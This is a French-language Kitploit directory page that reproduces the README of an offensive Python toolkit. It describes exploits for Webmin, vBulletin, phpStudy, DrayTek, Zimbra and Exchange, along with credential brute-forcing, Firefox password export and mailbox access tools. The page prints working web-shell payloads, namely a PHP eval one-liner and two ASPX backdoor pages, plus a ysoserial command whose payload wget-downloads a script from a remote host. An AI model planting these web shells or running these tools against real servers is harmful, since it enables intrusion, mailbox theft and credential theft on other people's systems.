Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Homework-of-Python — Python codes of my blog. | Kitploit
Outils/GitHubGitHub/3gstudent/homework-of-python
Vulnerability ScannersPassword AttacksExploitationWeb Application ExploitationInformation GatheringPost-ExploitationRed TeamingPayload Development
GitHub3gstudent/homework-of-python

Homework-of-Python

Python codes of my blog.

Voir le dépôt
412126il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Homework-of-Python

Codes Python de mon blog.

pptp_password_hack.py

Utilise une attaque par force brute pour obtenir le mot de passe du VPN PPTP.

Il lit les mots de passe contenus dans le fichier (nommé wordlist) puis utilise pptpsetup pour se connecter au serveur.

L'intervalle de temps est de 10 secondes.


portscan.py

Permet de scanner les ports.

Le délai d'expiration (timeout) est de 3 secondes.

Version C++ :

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

Permet d'obtenir l'adresse IP à partir de l'URL.

Je peux utiliser directement le résultat de Sublist3r.

file_deduplication(For_urltoip).py

Permet de supprimer les adresses IP en double du résultat de Sublist3r.

Je peux utiliser directement le résultat de urltoip.py.

Les adresses IP peuvent être triées à l'aide de Sublime (F9).


file_deduplication.py

Permet de supprimer les éléments en double d'un fichier.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

Référence :

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

Permet d'appeler l'API de fofa et d'afficher les adresses IP des résultats.

Vous pouvez obtenir 100 résultats.

fofa_api_VIP.py

Permet d'appeler l'API de fofa et d'afficher les adresses IP des résultats.

Si vous êtes VIP, vous obtiendrez 10 000 résultats.


vBulletin_5.x_0day_pre-auth_RCE.py

Référence :

https://seclists.org/fulldisclosure/2019/Sep/31

Ex. :

root@kitploit:~
echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

Référence :

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Ex. :

root@kitploit:~
system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

Permet d'exporter les mots de passe de Firefox.

get_Exchange_version.py

Permet d'obtenir la version d'Exchange.

Obtenez d'abord le BuildNumber à partir du code source de l'URL, puis la version.

Référence :

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

Permet de scanner la vulnérabilité RCE SMBv3.

Le délai d'expiration (timeout) est de 3 secondes.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

Référence :

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

Les appareils DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta et Vigor300B 1.3.3_Beta, 1.4.2.1_Beta et 1.4.4_Beta permettent l'exécution de code à distance en tant que root (sans authentification) via des métacaractères shell dans l'URI cgi-bin/mainfunction.cgi..

Produits concernés :

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

Utilise l'API SOAP de Zimbra pour se connecter au serveur de messagerie Zimbra.

Utilisation :

root@kitploit:~
      Zimbra_SOAP_API.py <url> <username> <password> <mode>

mode :

  • low authentification pour un jeton de bas niveau
  • admin authentification pour un jeton administrateur
  • ssrf Utilisez CVE-2019-9621 pour obtenir le jeton administrateur

Ex. :

root@kitploit:~
      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

Permet de vérifier la validité d'un compte Exchange Web Service (prend en charge le texte en clair et ntlmhash).

Référence : https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Utilisation :

root@kitploit:~
checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Ex. :

root@kitploit:~
checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

Permet d'accéder à Autodiscover.xml et d'obtenir la configuration de l'utilisateur (prend en charge le texte en clair et ntlmhash).

Utilisation :

root@kitploit:~
checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Ex. :

root@kitploit:~
checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

Mode supplémentaire de checkAutodiscover.py

Ajoute un paramètre

ewsManage.py

Permet d'accéder à Exchange Web Service (prend en charge le texte en clair et ntlmhash).

Utilisation :

root@kitploit:~
ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


Ex. :

root@kitploit:~
ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

Permet de vérifier la validité des identifiants SSH (prend en charge le mot de passe et le fichier de clé privée).

Utilisation :

root@kitploit:~
sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Ex. :

root@kitploit:~
sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

Exécution de commandes à distance via SSH (prend en charge le mot de passe et le fichier de clé privée).

Utilisation :

root@kitploit:~
sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Ex. :

root@kitploit:~
sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

Permet de vérifier la validité des identifiants de eas (Exchange Server ActiveSync).

Utilisation :

root@kitploit:~
easCheck.py <host> <user> <password>

Ex. :

root@kitploit:~
easCheck.py 192.168.1.1 user1 password1

checkOWA.py

Permet de vérifier la validité d'un compte Exchange en se connectant à OWA.

Utilisation :

root@kitploit:~
checkOWA.py <url> <user> <password>

owaManage.py

Permet de lire les e-mails en se connectant à OWA.

Utilisation :

root@kitploit:~
owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

Utilise IMAP pour se connecter au serveur de messagerie.

Utilisation :

root@kitploit:~
imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

Permet d'implémenter l'authentification NTLM et de communiquer avec execCmd.aspx.

Les données de communication sont encodées en Base64.

Utilisation :

root@kitploit:~
aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

Version C# : SharpExchangeBackdoor.cs

Permet d'envoyer une charge utile (payload) à la backdoor webshell d'Exchange.

Prise en charge :

  • assemblyLoad
  • webshellWrite

Utilisation :

root@kitploit:~
    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

Ex. :

root@kitploit:~
    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx :

root@kitploit:~
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx :

root@kitploit:~
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

Zimbra_deserialization_RCE(CVE-2019-6980).py

Désérialisation d'objets non sécurisée - IMAP

Utilisation :

root@kitploit:~
<url> <user> <password> <payload path>

Ex. :

root@kitploit:~
https://192.168.1.1 [email protected] password1 payload.obj

Remarque :

Vous pouvez générer payload.obj comme ceci :

java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget https://192.168.1.1/test.sh --no-check-certificate -O /tmp/test.sh" > payload.obj


ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py

ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py

ExchangeDeserializeShell-NoAuth-ghostfile.py

Permet de tester l'exécution de code par désérialisation d'Exchange.
Des permissions de lecture et d'écriture des fichiers Exchange à l'exécution de code par désérialisation. Vous devez modifier la machineKey dans %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config pour implémenter l'exécution de code par désérialisation. <path> : owa ou ecp

Utilisation :

root@kitploit:~
    <url> <key> <path>

Ex.

root@kitploit:~
 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
 mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

Exchange_EWS_XML_Parser.py

Permet d'analyser les messages SOAP XML d'Exchange.


eacManage.py

Permet d'accéder au centre d'administration Exchange.

Utilisation :

root@kitploit:~
eacManage.py <url> <user> <password> <command>
<command>:
- ListAdminRoles
- NewAdminRoles
- EditAdminRoles
- DeleteAdminRoles
- AddMailbox
- RemoveMailbox
- ExportAllMailbox          
- GetCertificate 
- ExportCertificate          
          

vSphereAutomationAPI_Manage.py

Utilise l'API vSphere Automation (v7.0U1+) pour gérer la VM.

Prend en charge les VM Windows et Linux.

vSphereWebServicesAPI_Manage.py

Utilise l'API vSphere Web Services pour gérer la VM.

Référence : https://github.com/vmware/pyvmomi/

Installation : pip install --upgrade pyvmomi

vCenterLDAP_Manage.py

Permet de gérer la base de données LDAP sur vCenter.


SolarWindsOrion_Manage.py

Permet de gérer la plateforme SolarWinds Orion.

SolarWindsOrionAPI_Manage.py

Utilise l'API SolarWinds Orion pour gérer la plateforme Orion.


MailEnableManage.py

Permet de gérer le serveur de messagerie MailEnable.


blind_XXEPlatform_CVE-2019-9670.py

Il prend en charge la réception des résultats via les protocoles HTTP ou FTP.


ewsManage_Downloader.py

Permet d'accéder à Exchange Web Service (prend en charge le texte en clair et ntlmhash).

ewsManage_exchangelib_Downloader.py

Permet d'accéder à Exchange Web Service (prend en charge le texte en clair et ntlmhash).

ewsManage_requests_ntlm_Downloader.py

Utilise requests_ntlm2 pour accéder à Exchange Web Service (prend en charge le texte en clair et ntlmhash).

ewsManage_requests_ntlm_Session_Downloader.py

Utilise requests_ntlm2 pour accéder à Exchange Web Service (prend en charge le texte en clair et ntlmhash).

Utilise une session pour réduire les données de communication.


vCenter_ExtraCertFromMdb.py

Modifié à partir de https://github.com/horizon3ai/vcenter_saml_login

vCenter_GenerateLoginCookie.py

Modifié à partir de https://github.com/horizon3ai/vcenter_saml_login


Exchange_GetVersion_MatchVul.py

Permet d'obtenir la version d'Exchange et de faire correspondre les vulnérabilités existantes.

Exchange_GetVersion_ParseFromFile.py

Permet d'obtenir la version d'Exchange et d'analyser la version à partir de https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019.

Vous devez enregistrer https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019 sous le nom exchange.data.

Exchange_GetVersion_ParseFromWebsite.py

Permet d'obtenir la version d'Exchange et d'analyser la version à partir de https://docs.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019.


Exchange_GetInternalIP.py

Permet d'obtenir l'adresse IP interne d'Exchange.

Basé sur msf auxiliary/scanner/http/owa_iis_internal_ip, mais prend en charge davantage de serveurs Exchange.


vRealizeOperationsManager_GetVersion.py

Permet d'obtenir la version de vRealize Operations Manager.


BIG-IP_RunBash.py

Utilise bash pour exécuter des commandes.


SophosUTM_plxDecrypter.py

Permet de déchiffrer le fichier .plx de Sophos UTM.

Référence :

https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

https://github.com/the6p4c/bfs_extract

SophosUTM_ConfigParser.py

Permet d'analyser la configuration de Sophos UTM.


Télécharger l’outil